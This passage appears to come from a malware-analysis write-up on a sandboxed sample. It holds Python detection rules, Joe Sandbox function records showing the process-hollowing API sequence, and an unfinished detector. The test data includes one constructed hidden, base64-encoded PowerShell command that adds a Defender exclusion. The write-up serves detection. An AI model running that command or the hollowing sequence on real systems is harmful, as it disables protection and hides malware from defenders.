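     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"',
     "md5": "9D352BC46709F0CB5EC974633A0C3C94"},
]

# Constructed: the same cmdlet hidden behind -EncodedCommand (base64 of UTF-16LE). The
# report only shows the plain form; this record (Target 99) is not from the report.
ENCODED_CMD = base64.b64encode(
    'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Local\\Temp"'.encode("utf-16-le")).decode()
PROCESS_RECORDS.append({"id": 99, "path": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
                        "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + ENCODED_CMD,
                        "md5": "C32CA4ACFCC635EC1EA6ED8A34DF5FAC"})

HOLLOWING_HOSTS = {"regsvcs.exe", "regasm.exe"}     # .NET tools that always take an assembly path
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
QUOTED_OR_BARE = r'(?:"([^"]+)"|(\S+))'             # one command-line argument, quoted or not


def first(m, *groups):
    """First non-empty capture group of a match (the quoted or the bare alternative)."""
    return next((m.group(g) for g in groups if m.group(g)), None)


def powershell_script(cmdline):
    """Script text of a PowerShell command line, decoding -EncodedCommand/-enc/-ec/-e."""
    m = re.search(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else cmdline


def triage_processes(records):
    """Return findings {target, rule, detail} for the four behaviours seen in the report."""
    paths_by_hash = defaultdict(set)
    for r in records:
        paths_by_hash[r["md5"].lower()].add(r["path"].lower())
    findings = []
    for r in records:
        exe, cmd = r["path"].rsplit("\\", 1)[-1].lower(), r["cmdline"]
        if exe in ("powershell.exe", "pwsh.exe"):
            # Defender exclusion added for a path/process/extension, plain or encoded
            m = re.search(r"Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\s+" + QUOTED_OR_BARE,
                          powershell_script(cmd), re.I)
            if m:
                findings.append({"target": r["id"], "rule": "defender_exclusion", "detail": first(m, 1, 2)})
        elif exe == "schtasks.exe":
            # Task registered from an XML definition dropped in a temp directory
            m = re.search(r"/Create\b.*?/XML\s+" + QUOTED_OR_BARE, cmd, re.I)
            if m and any(t in first(m, 1, 2).lower() for t in TEMP_DIRS):
                tn = re.search(r"/TN\s+" + QUOTED_OR_BARE, cmd, re.I)
                findings.append({"target": r["id"], "rule": "schtasks_xml_from_temp",
                                 "detail": first(tn, 1, 2) if tn else first(m, 1, 2)})
        elif exe in HOLLOWING_HOSTS and cmd.strip().strip('"').lower() == r["path"].lower():
            # RegSvcs/RegAsm with no assembly argument: a hollowed host, not a real registration
            findings.append({"target": r["id"], "rule": "bare_regsvcs", "detail": r["path"]})
        if len(paths_by_hash[r["md5"].lower()]) > 1 and "\\appdata\\" in r["path"].lower():
            # Same hash as another process image, now running from a user-writable location
            findings.append({"target": r["id"], "rule": "self_copy_same_hash", "detail": r["md5"]})
    return findings
```

triage_processes(PROCESS_RECORDS) flags Targets 3, 5 and 99 (Defender exclusion, with the excluded path as detail), 7 and 13 (task Updates\uvbIwIYe from a Temp XML), 10 and 16 (bare RegSvcs.exe) and 11 (same MD5 as Target 0, running from AppData\Roaming); conhost produces nothing. The hash correlation is the cheapest of the four checks and is also the one an exclusion-only rule would miss, because the copy was excluded from Defender before it ever ran.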


                                                Execution Graph

                                                Execution Coverage:10%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:1%
                                                Total number of Nodes:286
                                                Total number of Limit Nodes:11

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477163310.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_76e0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Hq$Hq$Hq$Hq$Hq
                                                • API String ID: 0-3799487529
                                                • Opcode ID: c5657f123f8158e7e2297f1185183c8dcf915fb60f7f8ff84285df68440d522c
                                                • Instruction ID: a77dfe6530010b25194493b6e48d429bd7d98b5e301c50ebfbb68b5ccbdbc745
                                                • Opcode Fuzzy Hash: c5657f123f8158e7e2297f1185183c8dcf915fb60f7f8ff84285df68440d522c
                                                • Instruction Fuzzy Hash: C6426CB0A00218CFDB54DFA9C8547AEBBF6AF84300F14C569D40AAB395DF349985CFA5

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ry$ry$ry
                                                • API String ID: 0-128149707
                                                • Opcode ID: e71669dd3e25403b86c294e41f3017dba26e281130ed36db22734c00fdd1eec6
                                                • Instruction ID: 31174be2552fd56f994257d5609b97987f8c3fd6f866716eff76a90e95f48c96
                                                • Opcode Fuzzy Hash: e71669dd3e25403b86c294e41f3017dba26e281130ed36db22734c00fdd1eec6
                                                • Instruction Fuzzy Hash: 05D160B1E1420ADFCB18CFA5C4854AEFBB2FF89300F1585A6D411AB299D734DA42CF94

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ry$ry$ry
                                                • API String ID: 0-128149707
                                                • Opcode ID: 64291422df85751ae88e640949afb94a21cfc7096fa8a72061e7f3e3475b5d1a
                                                • Instruction ID: 31e73bb394beeff98d45df54ec1a5b28d7bf0c5e41373770b670178e878a0703
                                                • Opcode Fuzzy Hash: 64291422df85751ae88e640949afb94a21cfc7096fa8a72061e7f3e3475b5d1a
                                                • Instruction Fuzzy Hash: 68D15FB1E1420ADFCB18CFA5C4854AEFBB2FF89300F558566D411AB298D734DA42CF94

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ry$ry$ry
                                                • API String ID: 0-128149707
                                                • Opcode ID: dac0f28117bdcb0f2480df660d9d70090749466843e1e136c263b87a5682da41
                                                • Instruction ID: 42ab84f81fe604c56144903ca3abb2fefb4c412bb9d8ee405d08ae6d5d1a0227
                                                • Opcode Fuzzy Hash: dac0f28117bdcb0f2480df660d9d70090749466843e1e136c263b87a5682da41
                                                • Instruction Fuzzy Hash: 7EC14BB5E1420ADFCB18CF95C4858AEFBB6FF89300F518569D412AB298D734DA42CF94

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TuA$UC;"
                                                • API String ID: 0-2071649361
                                                • Opcode ID: b302fb64189c1bfbe5303c93f247050d83b735644a425a07fcbb9b901179b0b7
                                                • Instruction ID: 39f22a9b15084f110783e8e28a768a02e71570ba1302638aeef2b4d9bb80d2ae
                                                • Opcode Fuzzy Hash: b302fb64189c1bfbe5303c93f247050d83b735644a425a07fcbb9b901179b0b7
                                                • Instruction Fuzzy Hash: CA9128B4D24209DFCB08CFA6E59159EFBB2FF89350F10A42AE525AB264D730A941CF44

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TuA$UC;"
                                                • API String ID: 0-2071649361
                                                • Opcode ID: 0884089c2d1c76a94e35763d5d2b9666f0c61c9718437f8baa1fe16c23462e80
                                                • Instruction ID: 7685f46d09bce1f363205004dee78f57f98070e5dfe80c577dc7177b7f33a48b
                                                • Opcode Fuzzy Hash: 0884089c2d1c76a94e35763d5d2b9666f0c61c9718437f8baa1fe16c23462e80
                                                • Instruction Fuzzy Hash: 539119B4D2420DEFCB08CFA5E59159EFBB2FF89350F10A42AE525AB264D730A941CF44
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: z^I
                                                • API String ID: 0-307258731
                                                • Opcode ID: 22c37fe3be022cb5cd8de8720ec7cbd49bc4df72fd97393c7eefde2a61fe4bea
                                                • Instruction ID: 942f1501ad9989d5e0e4a8ec03d350381ba1af815ef2915600a9b732bb81e6a9
                                                • Opcode Fuzzy Hash: 22c37fe3be022cb5cd8de8720ec7cbd49bc4df72fd97393c7eefde2a61fe4bea
                                                • Instruction Fuzzy Hash: 70A116B5E142198FCB08CFAAC8806DDFBB2FF8D310F24806AD415AB255D7349986CF64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: z^I
                                                • API String ID: 0-307258731
                                                • Opcode ID: 5ffe9f2ca95a87278b3f554e64be92833ea9b268a50cd5a604022e0259074098
                                                • Instruction ID: 643cb80d4fafc8afce8e4431a082979c7d2acd44a5d121defed04baa173693b7
                                                • Opcode Fuzzy Hash: 5ffe9f2ca95a87278b3f554e64be92833ea9b268a50cd5a604022e0259074098
                                                • Instruction Fuzzy Hash: 6FA1D2B4E142198FCB08CFAAC9946DEFBB2EF89300F24946AD415BB254D7349985CF54
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: z^I
                                                • API String ID: 0-307258731
                                                • Opcode ID: 24cf2316d18713ae74676936f41711f5e1e10e7a4c492f1594c7f1152d24b6cd
                                                • Instruction ID: ee88a32c51dabe45939b0b5bb24d0db4749146cd4a1e398cf6a4be6c29c52f63
                                                • Opcode Fuzzy Hash: 24cf2316d18713ae74676936f41711f5e1e10e7a4c492f1594c7f1152d24b6cd
                                                • Instruction Fuzzy Hash: 4591C2B4E102198FCB08CFAAC98469EFBB2FF89300F24942AD415BB264D7349985CF54
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5=6
                                                • API String ID: 0-2897083178
                                                • Opcode ID: 2ba47031056ee663f88f321fdfbb23275196648f6c6d23bed7faccb4d1eb1c03
                                                • Instruction ID: a22c81705ef86d533dfd6a7b798ee57f60ec041cbb2014fa414bd113db9d49b7
                                                • Opcode Fuzzy Hash: 2ba47031056ee663f88f321fdfbb23275196648f6c6d23bed7faccb4d1eb1c03
                                                • Instruction Fuzzy Hash: D77137B4E1521A9FCB08CFA5D9414AEFBF2FF8A310F10E46AD016EB294D7749A018F54
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5=6
                                                • API String ID: 0-2897083178
                                                • Opcode ID: 2b75888a324b53ef268a7d645638156c011712851c335451f2b256f0d275efa7
                                                • Instruction ID: 1f826a380be0e5fa25af33a242ed918bb05297870023525522e36836975763b9
                                                • Opcode Fuzzy Hash: 2b75888a324b53ef268a7d645638156c011712851c335451f2b256f0d275efa7
                                                • Instruction Fuzzy Hash: 76613874E1521A9FCB08CFA5D9414AEFBF2FF89310F10E46AD016EB294D7749A018F54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bdf7c184af7bae80b6fbe402149d003b71e0d4ca2a2c6b44642c2514517c9000
                                                • Instruction ID: d49553fca85a4e4fe0cefd9467c87a1d5ea9fa5d8d62e732e4e93359dafbbe13
                                                • Opcode Fuzzy Hash: bdf7c184af7bae80b6fbe402149d003b71e0d4ca2a2c6b44642c2514517c9000
                                                • Instruction Fuzzy Hash: FD228730B112049FDB59DB69D490BAEB7F6EF89700F2540AAE146DB3A1CB35ED01CB61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477163310.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_76e0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 490970136d3dde7296ad2923f93b5f3b72163e6c0fc6879a112b1f883dc59ba9
                                                • Instruction ID: 3d0824a73faed538778f7c6d7dfad66d5159569088ec5058c975926403fa0da4
                                                • Opcode Fuzzy Hash: 490970136d3dde7296ad2923f93b5f3b72163e6c0fc6879a112b1f883dc59ba9
                                                • Instruction Fuzzy Hash: 06C15DB1D01255CFCB15CFA8C8807ADBBF6AF89300F14C1AAD44AAB255EB30D985CF61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1466853559.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12b0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94744ffa28c75c31936133ea9d66cdc27b47c923f33b1cb81f882ff01ee021b9
                                                • Instruction ID: 2583802def9a35a968080ab9bc56ad3c791df8fdaf80e5cbd4db35c5248ba935
                                                • Opcode Fuzzy Hash: 94744ffa28c75c31936133ea9d66cdc27b47c923f33b1cb81f882ff01ee021b9
                                                • Instruction Fuzzy Hash: A9513163E70D8587DB05743A8CE73EA06C5476676CF14C304931AAABE3F6DACC918386
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24ff135a8b40c017c75130c1265a20c142d1758feebf116f7502516e7a3d5111
                                                • Instruction ID: 00ec88724e09b37009acabab7d5904aa8c8a000dd4ac2e3a24237cfa91dde6bd
                                                • Opcode Fuzzy Hash: 24ff135a8b40c017c75130c1265a20c142d1758feebf116f7502516e7a3d5111
                                                • Instruction Fuzzy Hash: 873129B1E056588BDB18CFA6D8502DEFFB2BFC9300F14C06AD509AB264DB345946CF50

                                                Control-flow Graph
                                                • Rendered graph not reproduced (executed/not-executed colouring lost). Function 6d94774-6d94ac5, graph nodes 698-758. CreateProcessA is called from block 6d9490f-6d949c9, which branches to 6d949cb-6d949d1 or 6d949d2-6d94a58; the preceding blocks 6d94817-6d94907 are four short loops (6d94835-6d94844, 6d9488e-6d9489d, 6d948f6-6d94905 and their entry checks).
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06D949B6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 21bbfe1f7a4cae21b2a8d55cb6bbe56330995ccb63120d05cb1987c3af0385ba
                                                • Instruction ID: df7dcae2fed5578e793cf8a1d1d05f3cccaf0cfa4ea1d94ca450b40ab5c17ba4
                                                • Opcode Fuzzy Hash: 21bbfe1f7a4cae21b2a8d55cb6bbe56330995ccb63120d05cb1987c3af0385ba
                                                • Instruction Fuzzy Hash: 04A14971D002599FEF64DFA8C840BEDBBF2BF48314F148569E809A7241DB749986CFA1

                                                Control-flow Graph
                                                • Rendered graph not reproduced. Function 6d94780-6d94ac5, graph nodes 759-815 (same body as the function above, entered at 6d94780). CreateProcessA is called from block 6d9490f-6d949c9, branching to 6d949cb-6d949d1 or 6d949d2-6d94a58.
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06D949B6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 780f99931a49ec8a22e079e34341d64c164634f864242d9031833b857f13f6b0
                                                • Instruction ID: 636f6807dde6fd8e0905ddfdf17ea35787367ab6737126c4d72d42f55ec13246
                                                • Opcode Fuzzy Hash: 780f99931a49ec8a22e079e34341d64c164634f864242d9031833b857f13f6b0
                                                • Instruction Fuzzy Hash: B8913871D002599FEF64DFA8C840BEDBBF2BF48314F148569D809A7241DB749986CFA1

                                                Control-flow Graph
                                                • Rendered graph not reproduced. Function 12bae48-12bb0c8, graph nodes 816-872. Internal calls to 12ba1a0 (block 12bae59-12bae66), 12bb0d1 or 12bb0e0 (block 12bae6e), 12ba1ac (12baf00-12baf07), 12ba1bc (12baf48-12baf51), 12ba1cc and 12ba1dc (12baf6e-12baf7e). GetModuleHandleW is called from block 12bb080-12bb0ab.
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 012BB09E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1466853559.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12b0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 4bfde62a29d083df0bd5df5206db7b09608105aeac12bb3e3f54e9251c02f667
                                                • Instruction ID: db49e5aa7019bfab19239345f7dcbc01720e645b213edce6f02c96c07685ebfd
                                                • Opcode Fuzzy Hash: 4bfde62a29d083df0bd5df5206db7b09608105aeac12bb3e3f54e9251c02f667
                                                • Instruction Fuzzy Hash: 037157B0A20B058FE724DF29D48179ABBF1BF88344F00892DE59AD7A40DB75E945CB94

                                                Control-flow Graph
                                                • Rendered graph not reproduced. Function 12b44b0-12b5a61, graph nodes 873-889. CreateActCtxA is called from the entry block 12b44b0-12b59d9, which branches to 12b59db-12b59e1 or 12b59e2-12b5a3c.
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 012B59C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1466853559.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12b0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 8eb16ee4fffe10833c032c2a9edf8ee6f3105b8dd77f9d9bd685cb7eaa543f08
                                                • Instruction ID: f12369e9ae26bb5a574de0ce99360de8feb3ca55d8067337d757453c1b0e0b61
                                                • Opcode Fuzzy Hash: 8eb16ee4fffe10833c032c2a9edf8ee6f3105b8dd77f9d9bd685cb7eaa543f08
                                                • Instruction Fuzzy Hash: 7141D1B0C10719CFEB24CFA9D884BDDBBB5BF49304F20805AD509AB251DBB56986CF90

                                                Control-flow Graph
                                                • Rendered graph not reproduced. Function 12b590d-12b5a61, graph nodes 890-905 (same body as the function above, entered at 12b590d). CreateActCtxA is called from the entry block 12b590d-12b59d9.
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 012B59C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1466853559.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12b0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: fb27df02f350d0c457423bce075e8006a1c44278403f00d686fdd1ac877fa4fc
                                                • Instruction ID: f60e7867e3c3e9fb5d1cbb541144a79de60540f03bfa7a56b14cfc620cc85b1a
                                                • Opcode Fuzzy Hash: fb27df02f350d0c457423bce075e8006a1c44278403f00d686fdd1ac877fa4fc
                                                • Instruction Fuzzy Hash: 0A41C270C00719CFEB24CFA9D8847DDBBB5BF49304F24815AD409AB251DBB66986CF90

                                                Control-flow Graph
                                                • Rendered graph not reproduced. Function 76ea9c8-76eaaba, graph nodes 906-915. The entry block 76ea9c8-76ea9ed calls 76e9c10; CreateIconFromResourceEx is called from block 76eaa02-76eaa94, which branches to 76eaa96-76eaa9c or 76eaa9d-76eaaba.
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477163310.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_76e0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: CreateFromIconResource
                                                • String ID:
                                                • API String ID: 3668623891-0
                                                • Opcode ID: 709afc5d8adeb1d975ce10a2e47ec5140b0b39181daeecd00846c78a1ad7a3ab
                                                • Instruction ID: 950766ed4c9fd697495e446deb6f758aeaae1c6301a688ef0c2b7a3fea1f178b
                                                • Opcode Fuzzy Hash: 709afc5d8adeb1d975ce10a2e47ec5140b0b39181daeecd00846c78a1ad7a3ab
                                                • Instruction Fuzzy Hash: C43198B29003499FCB11CFA9C941AEEBFF8EF09310F14845AE515A7220C3399895CFA0

                                                Control-flow Graph
                                                • Rendered graph not reproduced. Function 6d944f3-6d945ce, graph nodes 918-925. WriteProcessMemory is called from block 6d94556-6d94595, which branches to 6d94597-6d9459d or 6d9459e-6d945ce.
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06D94588
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: daa34d0d48209e9180ce3192516d476b9767c3cf1ce022e564c3183c0645e873
                                                • Instruction ID: 61f416a4f568327886665e40abf6f5feaadfc5a990d3076f12b1df35db152c1b
                                                • Opcode Fuzzy Hash: daa34d0d48209e9180ce3192516d476b9767c3cf1ce022e564c3183c0645e873
                                                • Instruction Fuzzy Hash: A42124759003499FDB50CFAAC880BEEBBF5FF48310F10842AE919A7241C7789945CBA0
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06D94588
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 260a6d0e4e21808e74261c6caaa9d0f32c2ea1719b85b65827e339378133b23f
                                                • Instruction ID: 013396a63d7602a41ff5fd3a6c107aeb109e5146251584b11621482949af27b6
                                                • Opcode Fuzzy Hash: 260a6d0e4e21808e74261c6caaa9d0f32c2ea1719b85b65827e339378133b23f
                                                • Instruction Fuzzy Hash: 31211375D003599FDB50CFAAC881BEEBBF5FF48310F10842AE919A7241D7789945CBA4
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012BD6E6,?,?,?,?,?), ref: 012BD7A7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1466853559.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12b0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: aa8475bb5c93849dd946a7efae11fd49a3b16a31c6887ea7098bb2861c745bb2
                                                • Instruction ID: 2c721df18b2e7f04976f31d3ff468ae6a0a451120077b7a0febc4c33785c9051
                                                • Opcode Fuzzy Hash: aa8475bb5c93849dd946a7efae11fd49a3b16a31c6887ea7098bb2861c745bb2
                                                • Instruction Fuzzy Hash: D721E5B59102489FDB10CF9AD584ADEBFF4EB48310F14841AE919A3310D378A954CFA5
                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06D94668
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 7a77d5283c782b0147e3f87264b1913589d11b42a80d0f4e81e8bace2840a633
                                                • Instruction ID: b333fb1296d67465be159feee3b915a66b63efdc070e7b72bec0380f07bf2356
                                                • Opcode Fuzzy Hash: 7a77d5283c782b0147e3f87264b1913589d11b42a80d0f4e81e8bace2840a633
                                                • Instruction Fuzzy Hash: FC212771D003499FDB10CFAAC880BDEBBF5FF48320F108429E519A7240C7799945CBA4
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D93B9E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 545047f3bc4caed9550c5907de9af69339322dcfe78eb963625c336f7f361c53
                                                • Instruction ID: 7c735fc0b8946b51d460cbccb51387976aa98a7a38a821878cdf2b8656873263
                                                • Opcode Fuzzy Hash: 545047f3bc4caed9550c5907de9af69339322dcfe78eb963625c336f7f361c53
                                                • Instruction Fuzzy Hash: F6212575D007088FDB20CFAAC4857EEBBF5EF88324F258429D459A7640CB789985CFA4
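                                                Read together, the API records above from the 06D90000 dump (CreateProcessA at 06D949B6, ReadProcessMemory at 06D94668, WriteProcessMemory at 06D94588 and Wow64SetThreadContext at 06D93B9E) are the call set characteristic of process hollowing: a child process is created, its memory is read and overwritten, and the context of its initial thread is replaced. The report logs every argument as ?, so neither the creation flags nor the written contents can be read off this page. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it scores a constructed API trace for that call pattern. The trace, its handle values, the CREATE_SUSPENDED check and the ResumeThread stage (which this excerpt does not list) are assumptions made for illustration.

```python
"""Process-hollowing pattern detector over an API-call trace.

Added example (not code from the Joe Sandbox report or from the sample).
The trace below is constructed to mirror the APIs named in this section:
CreateProcessA, ReadProcessMemory, WriteProcessMemory and
Wow64SetThreadContext. Handle values, arguments and call order are
assumptions for illustration; the report itself logs every argument as '?'.
"""
from __future__ import annotations

from dataclasses import dataclass, field

# dwCreationFlags bit documented by Microsoft for CreateProcess*.
CREATE_SUSPENDED = 0x00000004


@dataclass
class ApiCall:
    api: str
    args: dict


@dataclass
class HollowingVerdict:
    suspicious: bool = False
    stages: list[str] = field(default_factory=list)
    child_handles: set[int] = field(default_factory=set)


def detect_process_hollowing(trace: list[ApiCall]) -> HollowingVerdict:
    """Walk the trace in order, tracking processes the sample created itself.

    The verdict becomes suspicious once a thread of a child process has its
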